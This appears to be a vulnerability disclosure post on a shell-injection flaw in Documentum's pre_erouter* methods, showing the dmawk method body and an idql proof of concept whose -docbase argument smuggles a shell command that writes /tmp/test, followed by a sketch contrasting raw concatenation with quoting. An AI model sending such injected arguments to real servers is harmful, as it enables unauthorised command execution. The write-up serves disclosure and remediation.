Documentum security vulnerabilities: pre_erouter* methods

Like other vulnerable methods (dm_event_sender, replicate_setup_methods), the pre_erouter* methods do not check their input parameters and can be used to execute any shell command:

API> retrieve,c,dm_method where object_name like 'pre_erouter%'
...
1001ffd78000046c
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : pre_erouter1_queue
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : dmawk
  launch_direct                   : F
  launch_async                    : F
  trace_launch                    : T
  run_as_server                   : T
  use_method_content              : T
  method_type                     : dmawk
  use_method_server               : F
  is_restartable                  : F
#  Echo_attr()
  cmdstr = "dmbasic -f " dm_home"/bin/dm_rendPDF_preq.ebs" \
        " -e preq -- " \
        " -docbase " docbase_name \
        " -user " user_name \
        " -router " routerid \
        " -package " packageid \
        " -task " task \
        " -source " source \
        " -ticket " ticket
  ret = system(cmdstr)
  exit (ret)

Example of exploitation:

 ~]$ cat  /tmp/test
cat: /tmp/test: No such file or directory
 ~]$ idql repo -Uusername -Ppassword >/dev/null <<_EOF_
> execute do_method with method='pre_erouter4_forward',
> arguments='-docbase ";echo awk_methods_have_vulnerability > /tmp/test;"'
> go
> _EOF_

 ~]$ cat  /tmp/test
awk_methods_have_vulnerability
 ~]$

This vulnerability was reported as CS-44409 (Security vulnerability with pre_erouter methods – shell injection).
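
The method body shown above concatenates caller-supplied values into cmdstr and passes the result to system(), so the shell interprets any metacharacters in them. The sketch below is an added example, not code from the original post or from Documentum: it puts the same concatenation next to a variant that single-quotes the value first. build_cmd, run_cmd and shquote are hypothetical names, and echo stands in for the dmbasic call.

```shell
#!/bin/sh
# Stand-in for the method body: builds a command line from an untrusted
# -docbase value. Mode "raw" mimics the concatenation in the post; mode
# "quoted" passes the value through shquote() first. Names are hypothetical.
build_cmd() {   # usage: build_cmd raw|quoted VALUE
    MODE="$1" DOCBASE="$2" awk '
    # Single-quote s for /bin/sh. Each embedded quote is replaced by the
    # four characters: quote, backslash, quote, quote.
    function shquote(s,    q) {
        q = "\047"
        gsub(q, q "\\" q q, s)
        return q s q
    }
    BEGIN {
        v = ENVIRON["DOCBASE"]      # ENVIRON passes the value without -v escape processing
        if (ENVIRON["MODE"] == "quoted")
            v = shquote(v)
        # "echo" stands in for: dmbasic -f <script> -e preq --
        print "echo -docbase " v
    }'
}

# Execute the built string the way awk system() does: through /bin/sh.
run_cmd() {
    sh -c "$(build_cmd "$1" "$2")"
}
```

Quoting keeps each value a single argument to the child process; it does not validate what the value contains.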
